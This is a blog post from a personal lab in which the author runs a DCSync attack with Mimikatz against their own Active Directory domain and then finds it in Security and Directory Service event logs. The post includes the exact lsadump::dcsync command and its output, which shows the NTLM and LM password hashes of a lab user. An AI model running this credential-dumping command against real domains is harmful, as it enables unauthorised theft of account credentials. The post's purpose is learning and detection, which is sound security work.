Sunday, January 2, 2022

Beginning DC Sync - Attack

In this post, I learning about how we can perform and detect a DC Sync attack using Mimikatz. In a DCSync attack, we are standing up a normal computer to act as a domain controller. Once this "normal" computer acts like a domain controller, we can then perform replication, requesting information on a particular user or all users if we wish.

I connected to a workstation as a user with Domain Admin privileges. 

C:\Tools\mimikatz_trunk\x64
λ whoami /upn
admin@securitynik.local

Confirming the group membership.

C:\Tools\mimikatz_trunk\x64
λ net group "Domain Admins" /domain
The request will be processed at a domain controller for domain securitynik.local.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
mysqlsvc                 admin                    Administrator

The command completed successfully.

Before going any further, I've configured my Windows 2019 server, to track replication changes.

Group Policy Management -> My Domain Policy ("SecurityNik - Default - Domain Policy") -> Computer Configuration -> Advanced Audit Policy Configuration -> Audit Policies -> DS Access:
    Detailed Directory Service Replication: Success and Failure
    Directory Service Access : Success and Failure
    Active Directory Domain Services Object Changes : Success and Failure
    Directory Service Replication : Success and Failure.

First up, collecting information about a particular user

C:\Tools\mimikatz_trunk\x64                                                                                  
λ mimikatz.exe "lsadump::dcsync /domain:securitynik.local /user:tq" exit                                     
                                                                                                             
  .#####.   mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59                                                 
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)                                                                  
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )                                     
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz                                                       
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )                                    
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/                                    
                                                                                                             
mimikatz(commandline) # lsadump::dcsync /domain:securitynik.local /user:tq                                   
[DC] 'securitynik.local' will be the domain                                                                  
[DC] 'dc-2019.securitynik.local' will be the DC server                                                       
[DC] 'tq' will be the user account                                                                           
                                                                                                             
Object RDN           : tq                                                                                    
                                                                                                             
** SAM ACCOUNT **                                                                                            
                                                                                                             
SAM Username         : tq                                                                                    
User Principal Name  : tq@securitynik.local                                                                  
Account Type         : 30000000 ( USER_OBJECT )                                                              
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )                                        
Account expiration   :                                                                                       
Password last change : 10/16/2021 12:55:37 PM                                                                
Object Security ID   : S-1-5-21-2112827174-2190297626-1763567496-1104                                        
Object Relative ID   : 1104                                                                                  
                                                                                                             
Credentials:                                                                                                 
  Hash NTLM: 23e1d10001876b0078a9a779017fc026                                                                
    ntlm- 0: 23e1d10001876b0078a9a779017fc026                                                                
    ntlm- 1: 23e1d10001876b0078a9a779017fc026                                                                
    lm  - 0: 28efaa5798e5b2fedee619ea7e0116d4                                                                
    lm  - 1: df03317c4db79c05f4db99852f01f006                                                                
                                                                                                             
Supplemental Credentials:                                                                                    
* Primary:NTLM-Strong-NTOWF *                                                                                
    Random Value : 81800db4fa61ba2c6cf2164e34759c2a                                                          
...

Looking specifically at the Security Event log for event with ID 4928 relating to Detailed Directory Replication, we see the various naming contexts being replicated with SECURITYNIK-WIN. This device is my Windows 10 host and is not a Domain Controller.

An Active Directory replica source naming context was established.

Destination DRA:	CN=NTDS Settings,CN=DC-2019,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local
Source DRA:	CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local
Source Address:	1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local
Naming Context:	CN=Schema,CN=Configuration,DC=securitynik,DC=local
Options:		2147484016
Status Code:	0

An Active Directory replica source naming context was established.

Destination DRA:	CN=NTDS Settings,CN=DC-2019,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local
Source DRA:	CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local
Source Address:	1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local
Naming Context:	DC=securitynik,DC=local
Options:		368
Status Code:	0

Looking at Event 1548 in the Directory Service log, we see:

During replication, Active Directory Domain Services found the following object or its parent object in a directory partition on the local domain controller that is different from the following directory partition from which changes are being replicated. This can occur when the object or its parent object has been moved across partitions. However, due to replication latency, one of the directory servers has not yet received notification of the move. 
 
Object:
CN=tq,OU=SecurityNik-Users,DC=securitynik,DC=local 
Object GUID:
7b76ce2a-c5d9-42ec-b246-cba68d5d23ee 
Parent object GUID (if available):
9234d83c-d3fc-49c0-8024-2eee57d9179b 
Directory partition:
CN=Configuration,DC=securitynik,DC=local 
Source directory server:
1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local 
 
Replication of this directory partition from this source directory server cannot continue at this time. This condition is transient. An attempt to replicate this directory partition will be tried again later.

Looking at event 2088, we see

Invalid DNS configuration may be affecting other essential operations on member computers, domain controllers or application servers in this Active Directory Domain Services forest, including logon authentication or access to network resources. 
 
You should immediately resolve this DNS configuration error so that this domain controller can resolve the IP address of the source domain controller using DNS. 
 
Alternate server name: 
 SECURITYNIK-WIN10.securitynik.local 
Failing DNS host name: 
 1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local 

The attempt to establish a replication link for the following writable directory partition failed. 
 
Directory partition: 
CN=Configuration,DC=securitynik,DC=local 
Source directory service: 
CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local 
Source directory service address: 
1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local 
Intersite transport (if any): 

The attempt to establish a replication link for the following writable directory partition failed. 
 
Directory partition: 
CN=Configuration,DC=securitynik,DC=local 
Source directory service: 
CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local 
Source directory service address: 
1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local 
Intersite transport (if any): 

There were quite a few errors about this failing in the Directory service log that might suggestion this is a potential issues.

References:
https://www.blackhat.com/docs/us-14/materials/us-14-Duckwall-Abusing-Microsoft-Kerberos-Sorry-You-Guys-Don't-Get-It.pdf
https://stealthbits.com/blog/dcshadow-attacking-active-directory-rogue-dcs/
https://pentestlab.blog/2018/04/16/dcshadow/
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4928

No comments:

Post a Comment